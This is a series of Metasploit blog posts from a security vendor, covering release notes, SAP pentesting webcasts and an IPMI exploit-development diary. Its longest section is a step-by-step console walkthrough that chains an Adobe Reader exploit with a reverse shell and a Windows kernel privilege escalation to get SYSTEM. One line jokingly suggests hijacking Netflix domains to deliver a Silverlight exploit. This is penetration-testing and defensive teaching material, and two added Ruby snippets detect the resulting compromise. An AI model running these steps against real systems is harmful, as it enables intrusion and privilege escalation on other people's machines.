This trend is not really surprising, given that financial, customer, employee and production data reside in a company's enterprise resource planning (ERP) systems, and they are juicy targets for all sorts of malicious hackers. What's worse, these systems have often grown organically over decades and are so complex that few people understand their organization's entire ecosystem, let alone some of SAP's protocols and components that are not publicly documented. This year, we've made a significant effort to make Metasploit a better SAP pentesting platform, due in large part to an awesome community we should thank again (and again, and again...). Because of their awesome work, there are now more than 50 SAP-related modules in the framework. So, if you meet some of these guys, stop them and say thank you!

 

 

Thanks to all of them, the most important SAP infrastructure components are now covered by Metasploit, including:

 

  • DIAG/RFC communications, with support for the nwrfc wrapper on the Q Metasploit Repository.
  • The SAP Router.
  • The SAP Management Console.
  • The SAP Internet Communication Manager and the SAP Internet Communication Framework.
  • The J2EE Engine.

 

Not only code has been added to Metasploit. All of these capabilities, and how to use them, are covered in a free research paper which you can download here: "SAP Penetration Testing Using Metasploit - How to Protect Sensitive ERP Data". We have also published several webcasts where you can learn more about SAP exploitation with Metasploit from the authors:

 

 

So, there are no excuses for not taking SAP infrastructures into account when planning 2014's pentest engagements. The tools are out there!

Recently, FireEye identified and shared information about two vulnerabilities used in the wild to exploit Adobe Reader on Windows XP SP3 systems. The vulnerabilities are:

 

  • CVE-2013-3346: A use-after-free in Adobe Reader, specifically in the handling of a ToolButton object, which can be triggered through the document's JavaScript. This vulnerability is used to get remote code execution through a malicious PDF document. The code runs in a renderer process, inside the Adobe Reader sandbox if it is available.
  • CVE-2013-5065: An out-of-bounds array access in the Windows kernel driver ndproxy.sys. This vulnerability allows escaping the Adobe Reader sandbox, so that new processes can be executed and persistence achieved easily. As has already been disclosed, remember that the Routing and Remote Access service must be enabled on the target so the NDProxy driver is available.

 

Metasploit already has modules available for both vulnerabilities:

 

 

In this blog post we're going to explain how to chain both modules to accomplish Adobe Reader Sandbox bypass like in the wild.

 

  • First of all, a session from a Reader renderer process is needed. To get one, either the file-format or the browser version of the adobe_toolbutton exploit can be used. In this example, the browser version is used:

 

  
msf > use exploit/windows/browser/adobe_toolbutton
msf exploit(adobe_toolbutton) > set SRVHOST 192.168.172.1
SRVHOST => 192.168.172.1
msf exploit(adobe_toolbutton) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(adobe_toolbutton) > set LHOST 192.168.172.1
LHOST => 192.168.172.1
msf exploit(adobe_toolbutton) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.172.1:4444 
[*] Using URL: http://192.168.172.1:8080/vMrwTnexHFjnis
[*] Server started.
msf exploit(adobe_toolbutton) > [*] 192.168.172.244  adobe_toolbutton - Gathering target information.
[*] 192.168.172.244  adobe_toolbutton - request: /vMrwTnexHFjnis/SZLfWc/
[*] 192.168.172.244  adobe_toolbutton - Sending PDF...
[*] Sending stage (769024 bytes) to 192.168.172.244
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.244:1039) at 2013-12-17 16:10:55 -0600

msf exploit(adobe_toolbutton) > sessions -i 1
[ ] Starting interaction with 1...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 

 

  • With this session it should not be possible to execute a new process, nor to migrate into an existing one, because the Reader sandbox prevents it:

 

  
meterpreter > execute -f c:\\windows\\system32\\calc.exe
[-] stdapi_sys_process_execute: Operation failed: Access is denied.
meterpreter > ps -S AcroRd32|cmd
Filtering on process name...

Process List
============

 PID   PPID  Name          Arch  Session     User                           Path
 ---   ----  ----          ----  -------     ----                           ----
 3304  3128  AcroRd32.exe        4294967295                                 
 3336  3304  AcroRd32.exe  x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
 3824  1452  cmd.exe             4294967295                                 


meterpreter > migrate 3824
[*] Migrating from 3336 to 3824...
[-] Error running command migrate: Rex::RuntimeError Cannot migrate into this process (insufficient privileges)

 

  • Here is where the ms_ndproxy local exploit comes to the rescue. Use it with the current session. Remember that the target process is, at this moment, inside the sandbox, so the exploit elevates the current process (it cannot execute a new one):

 

  
meterpreter > background
[*] Backgrounding session 1...
msf exploit(adobe_toolbutton) > use exploit/windows/local/ms_ndproxy
msf exploit(ms_ndproxy) > set SESSION 1
SESSION => 1
msf exploit(ms_ndproxy) > exploit

[*] Started reverse handler on 10.6.0.165:4444 
[*] Detecting the target system...
[*] Running against Windows XP SP3
[*] Checking device...
[+] \\.\NDProxy found!
[*] Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...
[+] Addresses successfully disclosed.
[*] Storing the kernel stager on memory...
[+] Kernel stager successfully stored at 0x1000
[*] Storing the trampoline to the kernel stager on memory...
[+] Trampoline successfully stored at 0x1
[*] Storing the IO Control buffer on memory...
[+] IO Control buffer successfully stored at 0xd0d0000
[*] Triggering the vulnerability, corrupting the HalDispatchTable...
[*] Executing the Kernel Stager throw NtQueryIntervalProfile()...
[*] Checking privileges after exploitation...
[+] Exploitation successful! Creating a new process and launching payload...
[!] Unable to create a new process, maybe you're into a sandbox. If the current process has been elevated try to migrate before executing a new process...

 

  • So even though no new session is created in this case, the original one should now belong to SYSTEM if the exploit has been successful:

 

  
msf exploit(ms_ndproxy) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

 

  • Even though we're still inside a sandboxed process, we should now be able to migrate, and finally to execute new processes:

 

  
meterpreter > execute -f c:\\windows\\system32\\calc.exe
[-] stdapi_sys_process_execute: Operation failed: Access is denied.
meterpreter > ps -S AcroRd32|cmd
Filtering on process name...

Process List
============

 PID   PPID  Name          Arch  Session  User                           Path
 ---   ----  ----          ----  -------  ----                           ----
 3304  3128  AcroRd32.exe  x86   0        JUAN-C0DE875735\Administrator  C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
 3336  3304  AcroRd32.exe  x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
 3824  1452  cmd.exe       x86   0        JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\cmd.exe


meterpreter > migrate 3824
[*] Migrating from 3336 to 3824...
[*] Migration completed successfully.
meterpreter > execute -f c:\\windows\\system32\\calc.exe
Process 2372 created.
meterpreter > ps -S calc
Filtering on process name...

Process List
============

 PID   PPID  Name      Arch  Session  User                           Path
 ---   ----  ----      ----  -------  ----                           ----
 2372  3824  calc.exe  x86   0        JUAN-C0DE875735\Administrator  c:\windows\system32\calc.exe


meterpreter > 
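From a defender's side, the tell-tale of the walkthrough above is in the second process listing: the sandboxed AcroRd32.exe child (PID 3336) now runs as NT AUTHORITY\SYSTEM while its parent still runs as the logged-on user. The following is an added example, not code from the post or from Metasploit, that parses Meterpreter-style `ps` output and flags exactly that "privilege inversion". The two listings embedded in it are copied from the session above as constructed sample input; the function and variable names are my own.

```ruby
# Added example; not code from the post or from Metasploit. It parses a
# Meterpreter-style `ps` listing and flags "privilege inversions": a process
# running as NT AUTHORITY\SYSTEM whose parent runs as an ordinary user.
# That is the footprint a kernel privilege escalation leaves when it elevates
# the token of a sandboxed child (here the Reader renderer, PID 3336) in place.

SYSTEM_USER = 'NT AUTHORITY\SYSTEM'.freeze

# Constructed samples: the two listings from the session above, before and
# after the local exploit ran. Single-quoted heredocs keep the backslashes.
PS_BEFORE = <<~'PS'
  PID   PPID  Name          Arch  Session     User                           Path
  ---   ----  ----          ----  -------     ----                           ----
  3304  3128  AcroRd32.exe        4294967295
  3336  3304  AcroRd32.exe  x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
  3824  1452  cmd.exe             4294967295
PS

PS_AFTER = <<~'PS'
  PID   PPID  Name          Arch  Session  User                           Path
  ---   ----  ----          ----  -------  ----                           ----
  3304  3128  AcroRd32.exe  x86   0        JUAN-C0DE875735\Administrator  C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
  3336  3304  AcroRd32.exe  x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
  3824  1452  cmd.exe       x86   0        JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\cmd.exe
PS

# Parse a fixed-width `ps` listing into hashes with :pid, :ppid, :name, :user.
# The User column offset is taken from the header line, because the column
# widths differ between listings (compare the two samples above). A user
# that the sandboxed session could not read comes back as nil.
def parse_ps(listing)
  lines = listing.lines.map(&:chomp)
  header = lines.find { |l| l.include?('PID') && l.include?('User') }
  raise ArgumentError, 'no ps header line found' unless header
  user_col = header.index('User')
  lines.each_with_object([]) do |line, rows|
    m = line.match(/\A\s*(\d+)\s+(\d+)\s+(\S+)/)
    next unless m
    # Everything from the User column onward; the Path column, when present,
    # is separated from the user by at least two spaces and is dropped here.
    user = line[user_col..-1].to_s.split(/\s{2,}/).first.to_s.strip
    rows << { pid: m[1].to_i, ppid: m[2].to_i, name: m[3],
              user: (user.empty? ? nil : user) }
  end
end

# Children that run as SYSTEM under a parent that does not. A parent whose
# user is unknown (blank column) cannot be judged and is skipped.
def privilege_inversions(rows)
  by_pid = rows.each_with_object({}) { |r, h| h[r[:pid]] = r }
  rows.select do |r|
    parent = by_pid[r[:ppid]]
    r[:user] == SYSTEM_USER && parent && parent[:user] && parent[:user] != SYSTEM_USER
  end
end

# One human-readable finding per inversion, ready for a ticket or an alert.
def report(listing)
  privilege_inversions(parse_ps(listing)).map do |r|
    "PID #{r[:pid]} (#{r[:name]}) runs as #{r[:user]} under PPID #{r[:ppid]}"
  end
end

puts(report(PS_AFTER)) if __FILE__ == $PROGRAM_NAME
```

Run on the "before" listing the report is empty; on the "after" listing it names PID 3336. The same heuristic (child token more privileged than the parent's, for a process that is supposed to be a low-integrity renderer) is cheap to run continuously from an EDR or Sysmon process-creation feed, and it is independent of which kernel bug did the elevating.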

 

 

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.

New Adobe Reader ROP Gadgets

This week, Juan Vazquez put together a neat one-two exploit punch that involves a somewhat recent Adobe Reader vulnerability (disclosed back in mid-May) and a sandbox escape via an OS privilege escalation bug. I won't give away the surprise there -- he'll have a blog post about it up in a few hours.  Part of the work, though, resulted in some new entries in Metasploit's RopDB; specifically, for Adobe Reader versions 9, 10, and 11.

 

If you're not already familiar with the RopDB that ships with Metasploit, you can brush up by reading Wei @_sinn3r Chen's write up about ROP chaining from way back in October, 2012, then follow up with his 2013 refresh.  Hopefully, these chains prove to be useful for exploit developers for a while, which should make turnaround for future (and recent past) Reader vulnerabilities quicker and easier.

 

YouTube Broadcasting

We have a fun module this week just in time for Xmas from Wei @_sinn3r Chen, the multi-platform YouTube broadcaster. To use it, simply point to a YouTube video ID (for example, XAg5KjnAhuU), fire it off on your compromised clients (Windows, Linux, or Mac), and amaze at the full-screen display of the video on your target's active desktops.

 

The most obvious use of such a module, of course, is for laughs, as you surprise your victims with sudden Rick Astley or Nyan Cat videos.  However, there is bona fide usefulness here, too. The real reason sinn3r popped this module out is that it makes for a great "payload" for a surprise training session. Imagine that you've kicked off a social engineering campaign against your own userbase, and you've gathered your sessions through straight user error (no exploits, no sneakiness, no nothing).  Now, instead of just handing off a report to your HR department head, you can also, on the spot, conduct some training on the compromised folks by immediately showing them what they did wrong.

 

It's super easy to record instructional videos and slap them up on YouTube; if you use YouTube's privacy settings to mark your video as 'unlisted', they won't get indexed, which makes them about as private as a limited-audience Gists or PasteBins. Not bad, and certainly easier than packing up a whole video payload or setting up your own streaming service.

 

To me, this seems like a pretty powerful mechanism to train naughty users in how to do the right thing. People get inured to nastygrams from their IT and HR departments really quickly, but a sudden 30 second video ad that tells them that what they just did was unsafe behavior can have a more immediate impact, especially if it's entertaining.

 

Finally, full-video post-exploit payloads are a hallmark of Hollywood hacking, as described in the original feature request, so this kind of thing can be really useful for regular training sessions or demos; who cares about passing hashes and dumping session credentials; show me funny cat videos and I'm sure to renew your engagement contract!

 

New Modules

Including those mentioned above, we've got eight new modules this week; six exploits, and two post modules. Four of the six exploits are client-side, which reminds me: Like every year now, we fully expect to see an avalanche of new out-of-the box laptops, desktops, phones, and tablets to hit the Internet Christmas morning. If you've been building out machines for your loved ones, do take a second to confirm that you've got your latest client-side patches all squared away before wrapping them up.

 

Exploit modules

 

Auxiliary and post modules

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

SAP applications contain a ton of juicy information, making them a great target for malicious attackers who are after intellectual property, financial statements, credit card data, PII and PHI. Breaching SAP systems opens the door for fraud, sabotage, and industrial espionage.

 

SAP systems have often organically grown and are hard to update, making them a soft target. What's worse, pentesters are often unfamiliar with SAP infrastructures and how to pentest SAP systems. To help with the latter, Rapid7 is hosting some webcasts to introduce penetration testers to some of the key SAP infrastructure components.

 

This week, we're hosting two free webcasts for you to consider:

 

SAP Pentesting: From Zero 2 Hero with Metasploit

 


Dave Hartley aka @nmonkee has recently contributed a number of SAP modules to the Metasploit Framework. In this technical webinar for penetration testers, he is going to present a brief overview of how these modules can be used to go from Zero to Hero to achieve SAPpwnstar status when assessing or encountering SAP systems during engagements. The webcast will provide a very high level overview of common SAP system vulnerabilities and misconfigurations as well as demonstrating how the Metasploit Framework can be leveraged to quickly and easily exploit and compromise misconfigured/vulnerable SAP systems.

 

Dave is a Principal Security Consultant for MWR InfoSecurity and has been working in the IT industry since 1998. Dave is a published author and has presented his research at several internationally respected security conferences such as 44CON, BSides, Sec-T, ZACON, DeepSec, T2, etc.

 

There are two showings for this webcast:

 

Become an SAP Pwn Star: Using Metasploit for ERP Security Assessments

 

In this technical webinar for penetration testers, Metasploit developers and security researchers Tod Beardsley and Juan Vazquez from the Metasploit team give an introduction to SAP for penetration testers. The webcast introduces viewers to the most important components of SAP and gives an overview of Metasploit modules for SAP provided by community contributors. The webinar includes a live demo and time for Q&A.

 

Tod Beardsley is the Engineering Manager at Rapid7 for the Metasploit Project, the world-renowned open source penetration testing platform. He has over twenty years of hands-on security knowledge, reaching back to the halcyon days of 2400 baud textfile BBSes and in-band telephony switching. Since then, he has held IT Ops and IT Security positions in large footprint organizations such as 3Com, Dell, and Westinghouse. Today, he is passionate (some might say militant) about open source software development, open source security research, and data liberation. He can often be found on Freenode IRC and Twitter as "todb."

 

Our second speaker and international hacker of mystery, Juan Vazquez, has been working as a security consultant on both offensive and defensive tasks since 2006. Juan works on the Metasploit project, dividing his time between writing exploits and helping the Metasploit community with their contributions. Juan started contributing to Metasploit 3 years ago as an open source contributor and joined the Rapid7 team in 2011.

 

There are two showings for this webcast:

 

Research Report: SAP Penetration Testing Using Metasploit – How to Protect Sensitive ERP Data

 

Prefer reading to watching a webcast? Check out this in-depth research paper, which explores a number of methods to exploit vulnerabilities within the SAP enterprise resource planning (ERP) system. These methods have been implemented and published in the form of more than 50 modules for Metasploit, a free, open source software for penetration testing. The modules enable companies to test whether their own systems could be penetrated by an attacker.

 

Download SAP Research Report here

Meterpreter Extended API

This week, we've got some new hotness for Meterpreter in the form of OJ TheColonial Reeves' new Extended API (extapi) functionality. So far, the extended API is for Windows targets only (hint: patches accepted), and here's the rundown of what's now available for your post-exploitation delight:

 

  • Clipboard Management: This allows for reading and writing from the target's clipboard. This includes not only text, like you'd expect, but a seamless download of files and images as well. Useful for grabbing interesting but temporary data such as passwords or files copied from remote sources.
  • Service Management:  Meterpreter users are familiar with the overview provided by regular 'ps', but the service management interface allows for more detailed readouts of running services; most notably, DACLs, load order group, the start up status, and whether that service can interact with the desktop.
  • Window Management: Gives the ability to easily enumerate all open windows. This can help penetration testers discover if a particular target is worth VNC'ing in on at the moment.

 

In addition to all this, the Extended API structure makes it a handy place to start prototyping new Meterpreter functionality for Meterpreter hackers who aren't named OJ. It's pretty well organized from the get-go and doesn't require refactoring to core Meterpreter functionality to get something put together and demo-able quickly. So, if you've got an idea of what you'd like to see Meterpreter make easier that's relevant to your particular pen-testing workflow, this is a great place to start.

 

New HttpServer / HttpClient HOWTO

Not too long ago, we announced Wei @_sinn3r Chen's Browser Exploit Server, a nice Ruby mixin that consolidates a lot of the grunt work behind developing exploits. This week, Wei has fleshed out more of the exploit dev documentation with a nice, compact HOWTO-style guide on writing modules that leverage the strengths of the revised HttpServer and HttpClient mixins, so read up on it here.

 

I've been bugging sinn3r to put together some YouTube videos on the process of exploit dev as well, complete with the requisite thumpa-thumpa music, but you are welcome to beat him to it by following his documentation for your next browser exploit. The kids love the YouTube, and watching exploit devs type is apparently an effective teaching technique for some.

 

SAP for People Closer to GMT

If you missed last week's SAP hacking webcast by Juan Vazquez, Christian Kirsch, and yours truly, we'll be hosting it again live next week. You can register here, and it'll be held mid-afternoon for those of you who are observing a European time zone. We hear SAP is big over there, so we'll be getting online early in the AM here in Austin to make sure you all can participate in our overview of the state of the art of SAP reconnaissance and exploitation with Metasploit.

 

New Modules

It's an even split this week between exploit and non-exploit modules, with eight total. Rails has another DoS that we exercise this week, thanks to sinn3r's Rails Action View auxiliary module which exploits CVE-2013-6414; now would be a fine time to check your Rails version and update accordingly to get the fix.

 

Exploit modules

 

Auxiliary and post modules

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

SAP SAPpy SAP SAP

We've been all SAP all the time here in the Independent Nations of Metasploit, and expect to be for the rest of the week. You might recall that Metasploit exploit dev, Juan Vazquez published his SAP survey paper a little while back; on Tuesday, we did a moderated twitter chat on the hashtag #pwnSAP with the major SAP-focused Metasploit contributors Bruno Morrison, Chris John Riley, and Dave Hartley; and today (Thursday, December 5), Juan and I will be hosting a webcast on the various and sundry SAP exposures that Metasploit covers, and There Will Be Demos and Q&A, so it should be fun.

 

The whole thing has been pretty eye-opening for me; there's been a bunch of movement in the research over the last 18-24 months or so, and I'm delighted that so many talented people are making noise about this in the form of Metasploit modules. Hopefully all this will raise some awareness of the risks and exposures involved with running huge, complex, interconnected systems like ERP in general.

 

Silverlight Exploit

In other (non-SAP) news, this week, we're shipping our first ever Silverlight exploit, which exploits MS12-022 (aka, CVE-2013-0074). That's exciting. Use your DNS MITM attacks to jack the Netflix domains, wait for Orange is the New Black fans to connect, and profit!

 

It's important to know that the vulnerability is in Silverlight proper, and not IE, so while our exploit targets Microsoft Internet Explorer only today, the vulnerability is actually cross-platform. So, now that we've done this groundwork of demoing how to write a Silverlight exploit in Metasploit, all we need now is some enterprising young researcher to port this to a working Apple implementation. Have at it!

 

New Modules

I know, I know, last week we kind of cheated you out of your usual complement of new modules, thanks to the Ruby float bug. To make it up to you, we have 14 new modules this week, including the Silverlight module mentioned above. Have at it! There's a lot of neat new attacks in there, so thanks again to our beloved community contributors for their efforts on these.

 

Exploit modules

 

Auxiliary and post modules

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

If you’re conducting security assessments on enterprise networks, chances are that you’ve run into SAP systems. In this blog post, I’d like to give you an introduction to SAP and ABAP to help you with your security audit.

 

The full SAP solution (ERP or SAP Business Suite) consists of several components. However, to manage the different areas of a large enterprise, probably one of the better known components or features of the SAP solution is the development system based on ABAP, the language used to build business applications on the SAP platform.

 

The traditional way to execute ABAP code is to use a transaction, for example, from any existing SAP client (which will be reviewed later):

 

[Figure image001.png: executing a transaction from the SAP client]

 

One way to simplify the concept of the SAP platform is to think of it as an application server. Most readers are probably familiar with Java-related application servers, so it’s easy to think of SAP as an ABAP application server. In fact, SAP is capable of running ABAP applications as well as applications written in Java. The name of SAP’s application server is SAP NetWeaver...

 

If you’d like to know more about this platform and how to pentest it with Metasploit, get your free research paper now "SAP Penetration Testing Using Metasploit - How to Protect Sensitive ERP Data."

 

If you'd like to join a live discussion on the topic, we're also hosting a tweet chat tomorrow, December 3, at noon ET under the hashtag #pwnSAP. Or you can register for our webcast on Thursday, December 6 at 2:00pm ET, "Become an SAP Pwn Star: Using Metasploit for ERP Security Assessments."

Metasploit 4.8.1 Released

Thanks to the revelations around the recent Ruby float conversion denial of service, aka CVE-2013-4164 discovered and reported by Charlie Somerville, this week's release is pretty slim in terms of content; on Friday (the day of the first disclosure), we pretty much dropped everything and got to work on testing and packaging up new Metasploit installers that ship with Ruby 1.9.3-p484, which fixes the bug.


As far as we are able to tell, it's merely a denial of service, so the worst that happens is that your given Ruby application can crash out with a segfault. Like most other Ruby bugs that lead to segfaults, we haven't been able to tease any code exec out, but it's not completely impossible.

 

So, in case it's not absolutely clear, Metasploit Community, Express, and Pro are all vulnerable as of Metasploit 4.8.0 and prior; again, we don't have a remote code exec path, but getting your assessment knocked out from under you can be more than a little unpleasant. Update to Metasploit 4.8.1 before you start your next engagement, and you'll be golden. We've also updated the Metasploit Framework repo to suggest ruby-1.9.3-p484, so take a moment to install that as well on your development environment if you're that sort.

 

We're not the only ones who were exposed to this, of course. If you have control over your Ruby installations, you'll want to update if you haven't already. If you rely on a cloud provider or some other kind of provisioning service, you should get with them; to take just one example, Sebastian Saunier has a procedure to update all your Heroku apps, all nicely scripted out in this gist.

 

PS: ruby-lang.org, it's a little unneighborly to disclose on a Friday; I'm sure the world's Ruby administrators could have used an extra weekday or two. No time is a good time for new vulns, but when Rapid7 discloses, we make every effort to make sure we coordinate around Wednesdays.

 

New Modules

Alas, we just have the one new exploit that managed to get landed before the Ruby code review and update freak out. I promise we'll have more next week, including the Metasploit module that exercises the aforementioned bug (it's landed on our development repo, but that won't be released until next week).

 

Exploit modules

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Browser Exploit Server

This release includes the much vaunted and anticipated BrowserExploitServer (BES) mixin, the brainchild of Metasploit exploit developer Wei @_sinn3r Chen. Metasploit, at its core, is designed to be both an exploit delivery system and exploit development system, so this new mixin should help tremendously with the latter. BES, in a nutshell, saves you, the exploit developer, a ton of time when it comes to common chores like operating system identification, browser identification, and plugin detection. It also adds some best-effort client vulnerability detection before firing off the exploit, which is handy if you need to keep your super-secret 0-day still super-secret.

 

There's a few other niceties in there as well, but I don't want to completely spoil the surprise. Sinn3r has written up some comprehensive documentation on using BrowserExploitServer as well as a bunch of refreshed hints on using HttpServer (which may or may not be an exploit). Note that it's on the module writer to decide which one is the right one to use; there are times where you may not want or need all the browser-y things that BES provides.

 


IPMI Exploiter's Diary

This week also sees the release of a proper exploit for one of the recently disclosed IPMI vulnerabilities; when the process of developing a reliable exploit has some particularly novel aspect, Metasploit exploit developer Juan Vazquez has a habit of churning out some really fascinating notes on the process. If you haven't already, check out his blog post, Exploiting the Supermicro Onboard IPMI Controller. It's a pretty detailed look at the process he and discoverer HD Moore went through to get reliable code execution on these buggers, so if you're interested in that sort of thing, or especially if you're stuck on something similar, posts like that one can really help you out.

 

KiTrap0D, Modularized

Finally, the other exploit module this week is, in fact, the first from Meterpreter grandmaster OJ TheColonial Reeves. While cleaning up Meterpreter, he noticed that the KiTrap0D implementation in Meterpreter's 'getsystem' function could be a little flaky. By default, Meterpreter supports a number of methods for privilege escalation to SYSTEM privileges, and attempts each one of them in order until one succeeds or they have all failed. While KiTrap0D is a fine strategy for this, it did occasionally crash the Meterpreter getsystem function, or worse, BSOD the box. Needless to say, the getsystem call shouldn't result in this kind of behavior, and so the decision was made to change getsystem so that it doesn't make use of exploits like this. As a result, KiTrap0D was removed from getsystem and turned into a regular local exploit module.

 

New Modules

Including the two exploit modules mentioned above, we have seven new modules this week. And yes, that's a compressed file memory bomb DoS module. No, it's not from 1988.

 

Exploit modules

 

Auxiliary and post modules

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Last week @hdmoore published the details about several vulnerabilities in the Supermicro IPMI firmware. With the advisory's release, several modules were landed in Metasploit in order to check Supermicro devices against several of the published vulnerabilities:

 

Module and purpose:

  • smt_ipmi_static_cert_scanner: This module can be used to check for devices using the static SSL certificate shipped with Supermicro Onboard IPMI controllers (CVE-2013-3619).
  • smt_ipmi_url_redirect_traversal: This module can be used to abuse a directory traversal in the url_redirect.cgi component and download files with root privileges. Authenticated access to the web interface is required.
  • smt_ipmi_cgi_scanner: This module can be used to remotely check whether a device is vulnerable to two unauthenticated remote buffer overflows, in the login.cgi (CVE-2013-3621) and close_window.cgi (CVE-2013-3623) components respectively.

 

Just a day after the advisory's release we were able to finish a functional exploit for one of the unauthenticated overflows (CVE-2013-3623), which gives root access to the device through the close_window.cgi component of the web interface.

 

This exploit development was quite interesting because we had only restricted remote access to a real Supermicro device, running firmware SMT_X9_214, plus, of course, emulation. While emulation is a great resource for finding vulnerabilities and developing proofs of concept, often it isn't enough to ensure a working exploit against a real device. In this post we would like to share a couple of tricks we used to finish the exploit against the real device. Hope you enjoy!

 

Traversal to the rescue

 

The first requirement for a working exploit against the real device is to know which common memory protections (NX, ASLR) apply. To get this information, the directory traversal vulnerability in url_redirect.cgi was used. Since the vulnerability allows reading arbitrary files with root privileges, even with restricted web access, it was perfect for gathering environment information. The trick was to use the traversal to read "/proc/self/maps". Even though the maps would be those of the url_redirect.cgi process, they were good enough to check the memory protections applied to the CGI processes. We were already aware of the lack of ASLR for the main executable and libraries, thanks to @hdmoore's previous experience with the UPnP exploit, and the maps also revealed that both the heap and the stack are executable:

 

00012000-00033000 rwxp 00012000 00:00 0          [heap]
bee78000-bee8d000 rwxp bee78000 00:00 0          [stack]

 

This information was highly valuable for designing the exploit for the close_window.cgi overflow, where the space and bad-character limitations would otherwise make a "return into libc system()" really hard!
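The two maps lines above are the whole story for this device, but the same check is worth automating for any firmware or process you are reviewing: read the maps file and list every mapping that is writable and executable at the same time. The following is an added example, not code from the post or from Metasploit, that does this for a complete /proc/<pid>/maps dump, so it generalises the manual read above from the two [heap]/[stack] lines to the whole address space. The sample input is constructed: the two rwxp lines are the ones recovered from the device, and the two r-xp lines with made-up paths are added only to show that ordinary mappings are not reported.

```ruby
# Added example; not code from the post or from Metasploit. Given the text of
# a /proc/<pid>/maps file (for instance one read through the url_redirect.cgi
# traversal, or simply `cat /proc/self/maps` on a device you administer), it
# reports every mapping that is writable and executable at once. "rwxp" on
# [heap] or [stack] means the process runs with no NX / W^X protection.

Mapping = Struct.new(:start_addr, :end_addr, :perms, :region) do
  def writable?
    perms[1] == 'w'
  end

  def executable?
    perms[2] == 'x'
  end

  def byte_length
    end_addr - start_addr
  end
end

# Constructed sample: the two [heap]/[stack] lines the post recovered from the
# device, plus two ordinary read-only/executable mappings with made-up paths.
MAPS_SAMPLE = <<~'MAPS'
  00008000-00010000 r-xp 00000000 1f:02 1234       /web/cgi/example.cgi
  00012000-00033000 rwxp 00012000 00:00 0          [heap]
  40000000-40020000 r-xp 00000000 1f:02 5678       /lib/example-libc.so
  bee78000-bee8d000 rwxp bee78000 00:00 0          [stack]
MAPS

# One mapping per line: start-end perms offset dev inode [pathname].
# Lines that do not fit the maps layout are ignored rather than raising.
def parse_maps(text)
  text.each_line.each_with_object([]) do |line, maps|
    m = line.chomp.match(/\A\s*(\h+)-(\h+)\s+([rwxps-]{4})\s+\h+\s+\S+\s+\d+\s*(.*)\z/)
    next unless m
    maps << Mapping.new(m[1].to_i(16), m[2].to_i(16), m[3], m[4].strip)
  end
end

# Mappings that violate W^X: writable and executable at the same time.
def wx_mappings(maps)
  maps.select { |mp| mp.writable? && mp.executable? }
end

# Summary a reviewer can act on: is NX missing on the two regions an
# overflow payload would most likely live in, and which regions are W+X.
def nx_audit(text)
  offenders = wx_mappings(parse_maps(text))
  regions = offenders.map(&:region)
  {
    heap_executable: regions.include?('[heap]'),
    stack_executable: regions.include?('[stack]'),
    wx_regions: regions,
    wx_bytes: offenders.sum(&:byte_length)
  }
end

if __FILE__ == $PROGRAM_NAME
  nx_audit(MAPS_SAMPLE).each { |k, v| puts "#{k}: #{v}" }
end
```

On the sample the audit reports both the heap and the stack as executable, with roughly 216 KB of writable-and-executable memory in total. An empty `wx_regions` list is what you want to see on a BMC; a non-empty one on [heap] or [stack] means the kernel or the toolchain is not enforcing NX for that process, and any memory-corruption bug in it becomes correspondingly easier to turn into code execution.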

 

Details matter

 

With the information above, and the help of qemu, a first version of the exploit could be developed. It was still not accurate enough to get shells on the real device, though! When exploiting, details and the environment matter, and the directory traversal vulnerability, powerful as it is, was not enough to get a session. In order to finish the exploit in a reasonable time, collecting debug information about the process on the real device became a requirement.

 

Having restricted shell access to the real Supermicro device, it was time to check what could be done with it:

 

ATEN SMASH-CLP System Management Shell, version 1.04
